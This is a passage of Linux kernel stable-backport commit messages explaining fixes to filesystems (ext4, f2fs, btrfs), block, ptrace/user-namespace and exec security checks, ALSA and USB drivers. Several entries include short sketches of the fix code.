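  list_for_each_entry_rcu(ns, &subsys->namespaces, dev_link) {
          if (ns->nsid == nsid)
                  break;
  }
  rcu_read_unlock();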
Signed-off-by: Sagi Grimberg <sagi@grimberg.me>
Signed-off-by: Solganik Alexander <sashas@lightbitslabs.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b4a567e811 upstream.
->queue_rq() should return one of the BLK_MQ_RQ_QUEUE_* constants, not
an errno.
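In other words, the relevant hunk in loop_queue_rq() becomes roughly:

  if (lo->lo_state != Lo_bound)
          return BLK_MQ_RQ_QUEUE_ERROR;   /* was: return -EIO; */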
Fixes: f4aa4c7bba ("block: loop: convert to per-device workqueue")
Signed-off-by: Omar Sandoval <osandov@fb.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e87f7329bb upstream.
In the last ilen case, i was already incremented, resulting in accessing an
out-of-bounds entry of do_replace and blkaddr.
Fix this by checking ilen first to exit the loop.
Fixes: 2aa8fbb9693020 ("f2fs: refactor __exchange_data_block for speed up")
Signed-off-by: Jaegeuk Kim <jaegeuk@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 05e6ea2685 upstream.
The struct file_operations instance serving the f2fs/status debugfs file
lacks an initialization of its ->owner.
This means that although that file might have been opened, the f2fs module
can still get removed. Any further operation on that opened file, releasing
included, will cause accesses to unmapped memory.
Indeed, Mike Marshall reported the following:
BUG: unable to handle kernel paging request at ffffffffa0307430
IP: [<ffffffff8132a224>] full_proxy_release+0x24/0x90
<...>
Call Trace:
[] __fput+0xdf/0x1d0
[] ____fput+0xe/0x10
[] task_work_run+0x8e/0xc0
[] do_exit+0x2ae/0xae0
[] ? __audit_syscall_entry+0xae/0x100
[] ? syscall_trace_enter+0x1ca/0x310
[] do_group_exit+0x44/0xc0
[] SyS_exit_group+0x14/0x20
[] do_syscall_64+0x61/0x150
[] entry_SYSCALL64_slow_path+0x25/0x25
<...>
---[ end trace f22ae883fa3ea6b8 ]---
Fixing recursive fault but reboot is needed!
Fix this by initializing the f2fs/status file_operations' ->owner with
THIS_MODULE.
This will allow debugfs to grab a reference to the f2fs module upon any
open on that file, thus preventing it from getting removed.
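Sketch of the resulting file_operations (member names as assumed for f2fs'
status file):

  static const struct file_operations stat_fops = {
          .owner   = THIS_MODULE,  /* lets debugfs pin f2fs while the file is open */
          .open    = stat_open,
          .read    = seq_read,
          .llseek  = seq_lseek,
          .release = single_release,
  };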
Fixes: 902829aa0b ("f2fs: move proc files to debugfs")
Reported-by: Mike Marshall <hubcap@omnibond.com>
Reported-by: Martin Brandenburg <martin@omnibond.com>
Signed-off-by: Nicolai Stange <nicstange@gmail.com>
Signed-off-by: Jaegeuk Kim <jaegeuk@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 204706c7ac upstream.
This reverts commit 1beba1b3a9.
The percpu_counter doesn't provide atomicity on a single core and consumes
more DRAM. That incurs an fs_mark test failure due to ENOMEM.
Signed-off-by: Jaegeuk Kim <jaegeuk@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 73b92a2a5e upstream.
Currently data journalling is incompatible with encryption: enabling both
at the same time has never been supported by design, and would result in
unpredictable behavior. However, users are not precluded from turning on
both features simultaneously. This change programmatically replaces data
journaling for encrypted regular files with ordered data journaling mode.
Background:
Journaling encrypted data has not been supported because it operates on
buffer heads of the page in the page cache. Namely, when the commit
happens, which could be up to five seconds after caching, the commit
thread uses the buffer heads attached to the page to copy the contents of
the page to the journal. With encryption, it would have been required to
keep the bounce buffer with ciphertext for up to the aforementioned five
seconds, since the page cache can only hold plaintext and could not be
used for journaling. Alternatively, it would be required to setup the
journal to initiate a callback at the commit time to perform deferred
encryption - in this case, not only would the data have to be written
twice, but it would also have to be encrypted twice. This level of
complexity was not justified for a mode that in practice is very rarely
used because of the overhead from the data journalling.
Solution:
If data=journaled has been set as a mount option for a filesystem, or if
journaling is enabled on a regular file, do not perform journaling if the
file is also encrypted, instead fall back to the data=ordered mode for the
file.
Rationale:
The intent is to allow seamless and proper filesystem operation when
journaling and encryption have both been enabled, and have these two
conflicting features gracefully resolved by the filesystem.
Fixes: 4461471107
Signed-off-by: Sergey Karamov <skaramov@google.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7e6e1ef48f upstream.
Don't load an inode with a negative size; this causes integer overflow
problems in the VFS.
[ Added EXT4_ERROR_INODE() to mark file system as corrupted. -TYT]
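The added check in ext4_iget() looks roughly like this (size being a local
loff_t; a sketch, not the literal diff):

  inode->i_size = ext4_isize(raw_inode);
  if ((size = i_size_read(inode)) < 0) {
          EXT4_ERROR_INODE(inode, "bad i_size value: %lld", size);
          ret = -EFSCORRUPTED;
          goto bad_inode;
  }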
Fixes: a48380f769 (ext4: rename i_dir_acl to i_size_high)
Signed-off-by: Darrick J. Wong <darrick.wong@oracle.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c48ae41baf upstream.
The commit "ext4: sanity check the block and cluster size at mount
time" should prevent any problems, but in case the superblock is
modified while the file system is mounted, add an extra safety check
to make sure we won't overrun the allocated buffer.
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5aee0f8a3f upstream.
Fix a large number of problems with how we handle mount options in the
superblock. For one, if the string in the superblock is long enough
that it is not null terminated, we could run off the end of the string
and try to interpret superblocks fields as characters. It's unlikely
this will cause a security problem, but it could result in an invalid
parse. Also, parse_options is destructive to the string, so in some
cases if there is a comma-separated string, it would be modified in
the superblock. (Fortunately it only happens on file systems with a
1k block size.)
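The fix parses a NUL-terminated private copy instead of the raw superblock
field; roughly (a sketch under assumed local names):

  if (sbi->s_es->s_mount_opts[0]) {
          char *s_mount_opts = kstrndup(sbi->s_es->s_mount_opts,
                                        sizeof(sbi->s_es->s_mount_opts),
                                        GFP_KERNEL);
          if (!s_mount_opts)
                  goto failed_mount;
          if (!parse_options(s_mount_opts, sb, &journal_devnum,
                             &journal_ioprio, 0))
                  ext4_msg(sb, KERN_WARNING,
                           "failed to parse options in superblock: %s",
                           s_mount_opts);
          kfree(s_mount_opts);
  }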
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cd6bb35bf7 upstream.
Centralize the checks for inodes_per_block and be more strict to make
sure the inodes_per_block_group can't end up being zero.
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 30a9d7afe7 upstream.
The number of 'counters' elements needed in 'struct sg' is
super_block->s_blocksize_bits + 2. Presently we have 16 'counters'
elements in the array. This is insufficient for block sizes >= 32k. In
such cases the memcpy operation performed in ext4_mb_seq_groups_show()
would cause stack memory corruption.
Fixes: c9de560ded
Signed-off-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Jan Kara <jack@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 69e43e8cc9 upstream.
'border' variable is set to a value of 2 times the block size of the
underlying filesystem. With 64k block size, the resulting value won't
fit into a 16-bit variable. Hence this commit changes the data type of
'border' to 'unsigned int'.
Fixes: c9de560ded
Signed-off-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d128af1787 upstream.
The AEAD givenc descriptor relies on moving the IV through the
output FIFO and then back to the CTX2 for authentication. The
SEQ FIFO STORE could be scheduled before the data can be
read from OFIFO, especially since the SEQ FIFO LOAD needs
to wait for the SEQ FIFO LOAD SKIP to finish first. The
SKIP takes more time when the input is SG than when it's
a contiguous buffer. If the SEQ FIFO LOAD is not scheduled
before the STORE, the DECO will hang waiting for data
to be available in the OFIFO so it can be transferred to C2.
In order to overcome this, first force transfer of IV to C2
by starting the "cryptlen" transfer first and then starting to
store data from OFIFO to the output buffer.
Fixes: 1acebad3d8 ("crypto: caam - faster aead implementation")
Signed-off-by: Alex Porosanu <alexandru.porosanu@nxp.com>
Signed-off-by: Horia Geantă <horia.geanta@nxp.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 64b875f7ac upstream.
When the flag PT_PTRACE_CAP was added the PTRACE_TRACEME path was
overlooked. This can result in incorrect behavior when an application
like strace traces an exec of a setuid executable.
Further PT_PTRACE_CAP does not have enough information for making good
security decisions as it does not report which user namespace the
capability is in. This has already allowed one mistake through
insufficient granularity.
I found this issue when I was testing another corner case of exec and
discovered that I could not get strace to set PT_PTRACE_CAP even when
running strace as root with a full set of caps.
This change fixes the above issue with strace, allowing root to strace
a setuid executable without setuid being disabled. More fundamentally,
this change allows what is allowable at all times, by using the correct
information in its decision.
Fixes: 4214e42f96d4 ("v2.4.9.11 -> v2.4.9.12")
Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bfedb58925 upstream.
During exec dumpable is cleared if the file that is being executed is
not readable by the user executing the file. A bug in
ptrace_may_access allows reading the file if the executable happens to
enter into a subordinate user namespace (aka clone(CLONE_NEWUSER),
unshare(CLONE_NEWUSER), or setns(fd, CLONE_NEWUSER)).
This problem is fixed with only necessary userspace breakage by adding
a user namespace owner to mm_struct, captured at the time of exec, so
it is clear in which user namespace CAP_SYS_PTRACE must be present in
to be able to safely give read permission to the executable.
The function ptrace_may_access is modified to verify that the ptracer
has CAP_SYS_ADMIN in task->mm->user_ns instead of task->cred->user_ns.
This ensures that if the task changes its cred into a subordinate
user namespace it does not become ptraceable.
The function ptrace_attach is modified to only set PT_PTRACE_CAP when
CAP_SYS_PTRACE is held over task->mm->user_ns. The intent of
PT_PTRACE_CAP is to be a flag to note that whatever permission changes
the task might go through the tracer has sufficient permissions for
it not to be an issue. task->cred->user_ns is always the same
as or descendent of mm->user_ns. Which guarantees that having
CAP_SYS_PTRACE over mm->user_ns is the worst case for the tasks
credentials.
To prevent regressions mm->dumpable and mm->user_ns are not considered
when a task has no mm, as simply failing ptrace_may_attach causes
regressions in privileged applications attempting to read things
such as /proc/<pid>/stat.
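Sketch of the dumpable check in __ptrace_may_access() after the change:

  mm = task->mm;
  if (mm &&
      ((get_dumpable(mm) != SUID_DUMP_USER) &&
       !ptrace_has_cap(mm->user_ns, mode)))   /* was the task's cred->user_ns */
          return -EPERM;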
Acked-by: Kees Cook <keescook@chromium.org>
Tested-by: Cyrill Gorcunov <gorcunov@openvz.org>
Fixes: 8409cca705 ("userns: allow ptrace from non-init user namespaces")
Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bcc7f5b4be upstream.
bdev->bd_contains is not stable before calling __blkdev_get().
When __blkdev_get() is called on a partition with ->bd_openers == 0
it sets
bdev->bd_contains = bdev;
which is not correct for a partition.
After a call to __blkdev_get() succeeds, ->bd_openers will be > 0
and then ->bd_contains is stable.
When FMODE_EXCL is used, blkdev_get() calls
bd_start_claiming() -> bd_prepare_to_claim() -> bd_may_claim()
This call happens before __blkdev_get() is called, so ->bd_contains
is not stable. So bd_may_claim() cannot safely use ->bd_contains.
It currently tries to use it, and this can lead to a BUG_ON().
This happens when a whole device is already open with a bd_holder (in
use by dm in my particular example) and two threads race to open a
partition of that device for the first time, one opening with O_EXCL and
one without.
The thread that doesn't use O_EXCL gets through blkdev_get() to
__blkdev_get(), gains the ->bd_mutex, and sets bdev->bd_contains = bdev;
Immediately thereafter the other thread, using FMODE_EXCL, calls
bd_start_claiming() from blkdev_get(). This should fail because the
whole device has a holder, but because bdev->bd_contains == bdev
bd_may_claim() incorrectly reports success.
This thread continues and blocks on bd_mutex.
The first thread then sets bdev->bd_contains correctly and drops the mutex.
The thread using FMODE_EXCL then continues and when it calls bd_may_claim()
again in:
BUG_ON(!bd_may_claim(bdev, whole, holder));
The BUG_ON fires.
Fix this by removing the dependency on ->bd_contains in
bd_may_claim(). As bd_may_claim() has direct access to the whole
device, it can simply test if the target bdev is the whole device.
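The resulting helper, roughly (the only change is testing whole == bdev
instead of bdev->bd_contains == bdev):

  static bool bd_may_claim(struct block_device *bdev, struct block_device *whole,
                           void *holder)
  {
          if (bdev->bd_holder == holder)
                  return true;    /* already a holder */
          else if (bdev->bd_holder != NULL)
                  return false;   /* held by someone else */
          else if (whole == bdev)
                  return true;    /* is a whole device which isn't held */
          else if (whole->bd_holder == bd_may_claim)
                  return true;    /* is a partition of a device being partitioned */
          else if (whole->bd_holder != NULL)
                  return false;   /* is a partition of a held device */
          else
                  return true;    /* is a partition of an un-held device */
  }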
Fixes: 6b4517a791 ("block: implement bd_claiming and claiming block")
Signed-off-by: NeilBrown <neilb@suse.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 613cc2b6f2 upstream.
If you have a process that has set itself to be non-dumpable, and it
then undergoes exec(2), any CLOEXEC file descriptors it has open are
"exposed" during a race window between the dumpable flags of the process
being reset for exec(2) and CLOEXEC being applied to the file
descriptors. This can be exploited by a process by attempting to access
/proc/<pid>/fd/... during this window, without requiring CAP_SYS_PTRACE.
The race in question is after set_dumpable has been called (the trace below
is for get_link, though it is basically the same for readlink):
  [vfs]
  -> proc_pid_link_inode_operations.get_link
     -> proc_pid_get_link
        -> proc_fd_access_allowed
           -> ptrace_may_access(task, PTRACE_MODE_READ_FSCREDS);
Which will return 0, during the race window and CLOEXEC file descriptors
will still be open during this window because do_close_on_exec has not
been called yet. As a result, the ordering of these calls should be
reversed to avoid this race window.
This is of particular concern to container runtimes, where joining a
PID namespace with file descriptors referring to the host filesystem
can result in security issues (since PRCTL_SET_DUMPABLE doesn't protect
against access of CLOEXEC file descriptors -- file descriptors which may
reference filesystem objects the container shouldn't have access to).
Cc: dev@opencontainers.org
Reported-by: Michael Crosby <crosbymichael@gmail.com>
Signed-off-by: Aleksa Sarai <asarai@suse.de>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f84df2a6f2 upstream.
When the user namespace support was merged the need to prevent
ptrace from revealing the contents of an unreadable executable
was overlooked.
Correct this oversight by ensuring that the executed file
or files are in mm->user_ns, by adjusting mm->user_ns.
Use the new function privileged_wrt_inode_uidgid to see if
the executable is a member of the user namespace, and as such
if having CAP_SYS_PTRACE in the user namespace should allow
tracing the executable. If not update mm->user_ns to
the parent user namespace until an appropriate parent is found.
Reported-by: Jann Horn <jann@thejh.net>
Fixes: 9e4a36ece6 ("userns: Fail exec for suid and sgid binaries with ids outside our user namespace.")
Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4867268c57 upstream.
Really there's lots of things that can go wrong here, kill all the
BUG_ON()'s and replace the logic ones with ASSERT()'s and return EIO
instead.
Signed-off-by: Josef Bacik <jbacik@fb.com>
[ switched to btrfs_err, errors go to common label ]
Reviewed-by: Liu Bo <bo.li.liu@oracle.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cea67ab92d upstream.
btrfs_rm_device frees the block device but then re-opens it using
the saved device name. A race exists between the close and the
re-open that allows the block size to be changed. The result
is getting stuck forever in the reclaim loop in __getblk_slow.
This patch moves the superblock cleanup before closing the block
device, which is also consistent with other callers. We also don't
need a private copy of dev_name as the whole routine operates under
the uuid_mutex.
Signed-off-by: Jeff Mahoney <jeffm@suse.com>
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6bdf131fac upstream.
We don't track the reloc roots in any sort of normal way, so the only way the
root/commit_root nodes get freed is if the relocation finishes successfully and
the reloc root is deleted. Fix this by freeing them in free_reloc_roots.
Thanks,
Signed-off-by: Josef Bacik <jbacik@fb.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3561b9db70 upstream.
When relocating tree blocks, we firstly get block information from
back references in the extent tree, we then search fs tree to try to
find all parents of a block.
However, if the fs tree is corrupted, e.g. if there are some missing
items, we could come across these WARN_ONs and BUG_ONs.
This makes us print some error messages and return gracefully
from balance.
Signed-off-by: Liu Bo <bo.li.liu@oracle.com>
Reviewed-by: Josef Bacik <jbacik@fb.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 49303381f1 upstream.
Currently we allow an inconsistency regarding the mixed flag
(BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_DATA).
We'd get ENOSPC if a block group has the mixed flag while btrfs doesn't.
If that happens, we have one space_info with the mixed flag and another
space_info only with BTRFS_BLOCK_GROUP_METADATA, and
global_block_rsv.space_info points to the latter one, but all bytes
from the block_group contribute to the mixed space_info, thus all the
allocations will fail with ENOSPC.
This adds a check for the above case.
Reported-by: Vegard Nossum <vegard.nossum@oracle.com>
Signed-off-by: Liu Bo <bo.li.liu@oracle.com>
[ updated message ]
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2571e73967 upstream.
So we can read a btree block via readahead or intentional read,
and we can end up with a memory leak when something happens as
follows,
1) readahead starts to read block A but does not wait for read
completion,
2) btree_readpage_end_io_hook finds that block A is corrupted,
and it needs to clear all block A's pages' uptodate bit.
3) meanwhile an intentional read kicks in and checks block A's
pages' uptodate to decide which page needs to be read.
4) some pages have the uptodate bit set during 3)'s check, so
3) doesn't count them for eb->io_pages, but they are later
cleared by 2), so we have to readpage on those pages; we get
the wrong eb->io_pages, which results in a memory leak of
this block.
This fixes the problem by firstly getting all pages's locking and
then checking pages' uptodate bit.
Timeline (t1 = readahead, t2 = readahead endio, t3 = the following read):
t1: read_extent_buffer_pages
      for pg in eb:
          if pg is uptodate: num_reads++
      eb->io_pages = num_reads
      for pg in eb:
          if pg is NOT uptodate: __extent_read_full_page(pg)
t2: end_bio_extent_readpage
      for page 0,1,2 in eb:
          btree_readpage_end_io_hook(pg)
          if uptodate: SetPageUptodate(pg)
t3: read_extent_buffer_pages
      for pg in eb:
          if pg is uptodate: num_reads++
      eb->io_pages = num_reads
t2:   for page 3 in eb:
          btree_readpage_end_io_hook(pg)
          sanity check reports something wrong
          clear_extent_buffer_uptodate(eb):
              for pg in eb: ClearPageUptodate(page)
t3:   for pg in eb:
          if pg is NOT uptodate: __extent_read_full_page(pg)
So t3's eb->io_pages is not consistent with the number of pages it's reading,
and during endio(), atomic_dec_and_test(&eb->io_pages) will get a negative
number so that we're not able to free the eb.
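The fix, in sketch form, makes read_extent_buffer_pages() lock every page
first and only then count the pages that still need reading:

  for (i = 0; i < num_pages; i++)
          lock_page(eb->pages[i]);

  /* Only now is the uptodate bit stable against a concurrent
   * clear_extent_buffer_uptodate() from the readahead endio. */
  for (i = 0; i < num_pages; i++)
          if (!PageUptodate(eb->pages[i]))
                  num_reads++;

  atomic_set(&eb->io_pages, num_reads);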
Signed-off-by: Liu Bo <bo.li.liu@oracle.com>
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 035cd485a4 upstream.
The OMAP36xx DPLL5, driving EHCI USB, can be subject to a long-term
frequency drift. The frequency drift magnitude depends on the VCO update
rate, which is inversely proportional to the PLL divider. The kernel
DPLL configuration code results in a high value for the divider, leading
to a long term drift high enough to cause USB transmission errors. In
the worst case the USB PHY's ULPI interface can stop responding,
breaking USB operation completely. This manifests itself on the
Beagleboard xM by the LAN9514 reporting 'Cannot enable port 2. Maybe the
cable is bad?' in the kernel log.
Errata sprz319 advisory 2.1 documents PLL values that minimize the
drift. Use them automatically when DPLL5 is used for USB operation,
which we detect based on the requested clock rate. The clock framework
will still compute the PLL parameters and resulting rate as usual, but
the PLL M and N values will then be overridden. This can result in the
effective clock rate being slightly different than the rate cached by
the clock framework, but won't cause any adverse effect to USB
operation.
Signed-off-by: Richard Watts <rrw@kynesim.co.uk>
[Upported from v3.2 to v4.9]
Signed-off-by: Laurent Pinchart <laurent.pinchart@ideasonboard.com>
Tested-by: Ladislav Michl <ladis@linux-mips.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Cc: Adam Ford <aford173@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5e0ad0d874 upstream.
Commit [64047d7f49 ALSA: hda - ignore the assoc and seq when comparing
pin configurations] intended to ignore both seq and assoc when comparing
pins, but it only ignored seq. So that commit may still fail to
match pins on some machines.
Change the bitmask to also ignore assoc.
v2: Use macro to do bit masking.
Thanks to Hui Wang for the analysis.
Fixes: 64047d7f49 ("ALSA: hda - ignore the assoc and seq when comparing...")
Signed-off-by: Kai-Heng Feng <kai.heng.feng@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f73cd43ac3 upstream.
HP Z1 Gen3 AiO with Conexant codec doesn't give an unsolicited event
to the headset mic pin upon jack plugging; it reports only to the
headphone pin. This results in missing mic switching. Let's fix it up
by simply gating the jack event.
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 989dbe4a30 upstream.
This group of new pins is not in the pin quirk table yet; add
them to the pin quirk table to fix the headset-mic problem.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 64047d7f49 upstream.
More and more pin configurations have been added to the pin quirk
table; lots of them differ only in assoc and seq, but they
all apply to the same QUIRK_FIXUP. If we don't compare assoc and seq
when matching pin configurations, it will greatly reduce the pin
quirk table size.
We have tested this change on a couple of Dell laptops, and it worked
well.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b5337cfe06 upstream.
I'm using an Alienware 15 R2 and had to use the alienware quirks to
get my headphone output working.
I fixed it by adding SND_PCI_QUIRK(0x1028, 0x0708, "Alienware 15 R2
2016", QUIRK_ALIENWARE) to the patch.
Signed-off-by: Sven Hahne <hahne@zeitkunst.eu>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 995c6a7fd9 upstream.
Sampling rate changes after the first one are not reflected to the
hardware, while the driver and ALSA think the rate has been changed.
Fix the problem by properly stopping the interface at the beginning of
the prepare call, allowing the new rate to be set in the hardware. This
keeps the hardware in sync with the driver.
Signed-off-by: Jussi Laako <jussi@sonarnerd.net>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 82ffb6fc63 upstream.
The Logitech QuickCam Communicate Deluxe/S7500 microphone fails with the
following warning.
[ 6.778995] usb 2-1.2.2.2: Warning! Unlikely big volume range (=3072),
cval->res is probably wrong.
[ 6.778996] usb 2-1.2.2.2: [5] FU [Mic Capture Volume] ch = 1, val =
4608/7680/1
Adding it to the list of devices in volume_control_quirks makes it work
properly, fixing a related typo.
Signed-off-by: Con Kolivas <kernel@kolivas.org>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3e448e13a6 upstream.
ep_list inside the gadget structure doesn't contain ep0.
It is stored separately in the ep0 field.
This causes an urb hang if the gadget driver decides to
delay setup handling. On the host side this is visible as
a timeout error when setting the configuration.
This bug can be reproduced using, for example, any gadget
with a mass storage function.
Fixes: abdb295743 ("usbip: vudc: Add vudc_transfer")
Signed-off-by: Krzysztof Opasiak <k.opasiak@samsung.com>
Acked-by: Shuah Khan <shuahkh@osg.samsung.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ccdb6be9ec upstream.
The UHCI controllers in Intel chipsets rely on a platform-specific non-PME
mechanism for wakeup signalling. They can generate wakeup signals even
though they don't support PME.
We need to let the USB core know this so that it will enable runtime
suspend for UHCI controllers.
Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Acked-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e8f29bb719 upstream.
usb_endpoint_maxp() returns wMaxPacketSize in its
raw form, without taking into consideration that it
also contains other bits reserved for isochronous
endpoints.
This patch fixes one occasion where this is a
problem by making sure that we initialize
ep->maxpacket only with the lower 10 bits of the value
returned by usb_endpoint_maxp(). Note that separate
patches will be necessary to audit all call sites of
usb_endpoint_maxp() and make sure that
usb_endpoint_maxp() only returns the lower 10 bits of
wMaxPacketSize.
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 37be66767e upstream.
USB-3 does not have any link state that will avoid negotiating a connection
with a plugged-in cable but will signal the host when the cable is
unplugged.
For USB-3 we used to first set the link to Disabled, then to RxDetect to
be able to detect cable connects or disconnects. But in RxDetect the
connected device is detected again and eventually enabled.
Instead set the link into U3 and disable remote wakeups for the device.
This is what Windows does, and what Alan Stern suggested.
Cc: Alan Stern <stern@rowland.harvard.edu>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Mathias Nyman <mathias.nyman@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6b9018d4c1 upstream.
In case of High-Speed, High-Bandwidth endpoints, we
need to tell DWC3 that we have more than one packet
per interval. We do that by setting PCM1 field of
Isochronous-First TRB.
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6774d5f532 upstream.
Kill urbs and disable read before returning from open on failure to
retrieve the line state.
Fixes: 1da177e4c3 ("Linux-2.6.12-rc2")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5b09eff0c3 upstream.
This patch adds support for PIDs 0x1040, 0x1041 of Telit LE922A.
Since the interface positions are the same as the ones used
for other Telit compositions, previously defined blacklists are used.
Signed-off-by: Daniele Palmas <dnlplm@gmail.com>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8d9eddad19 upstream.
We were setting the qgroup_rescan_running flag to true only after the
rescan worker started (which is a task run by a queue). So if a user
space task starts a rescan and immediately after asks to wait for the
rescan worker to finish, this second call might happen before the rescan
worker task starts running, in which case the rescan wait ioctl returns
immediately, not waiting for the rescan worker to finish.
This was making the fstest btrfs/022 fail very often.
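Sketch of the intended ordering (set the flag under qgroup_rescan_lock before
the worker is queued; field names as assumed here):

  mutex_lock(&fs_info->qgroup_rescan_lock);
  init_completion(&fs_info->qgroup_rescan_completion);
  fs_info->qgroup_rescan_running = true;        /* before the worker runs */
  mutex_unlock(&fs_info->qgroup_rescan_lock);

  btrfs_queue_work(fs_info->qgroup_rescan_workers,
                   &fs_info->qgroup_rescan_work);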
Fixes: d2c609b834 (btrfs: properly track when rescan worker is running)
Signed-off-by: Filipe Manana <fdmanana@suse.com>
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ed0df618b1 upstream.
The balance status item contains currently known filter values, but the
stripes filter was unintentionally not among them. This would mean that
an interrupted and automatically restarted balance does not apply the
stripes filter.
Fixes: dee32d0ac3
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 054570a1dc upstream.
During relocation of a data block group we create a relocation tree
for each fs/subvol tree by making a snapshot of each tree using
btrfs_copy_root() and the tree's commit root, and then setting the last
snapshot field for the fs/subvol tree's root to the value of the current
transaction id minus 1. However this can lead to relocation later
dropping references that it did not create if we have qgroups enabled,
leaving the filesystem in an inconsistent state that keeps aborting
transactions.
Lets consider the following example to explain the problem, which requires
qgroups to be enabled.
We are relocating data block group Y, we have a subvolume with id 258 that
has a root at level 1, that subvolume is used to store directory entries
for snapshots and we are currently at transaction 3404.
When committing transaction 3404, we have a pending snapshot and therefore
we call btrfs_run_delayed_items() at transaction.c:create_pending_snapshot()
in order to create its dentry at subvolume 258. This results in COWing
leaf A from root 258 in order to add the dentry. Note that leaf A
also contains file extent items referring to extents from some other
block group X (we are currently relocating block group Y). Later on, still
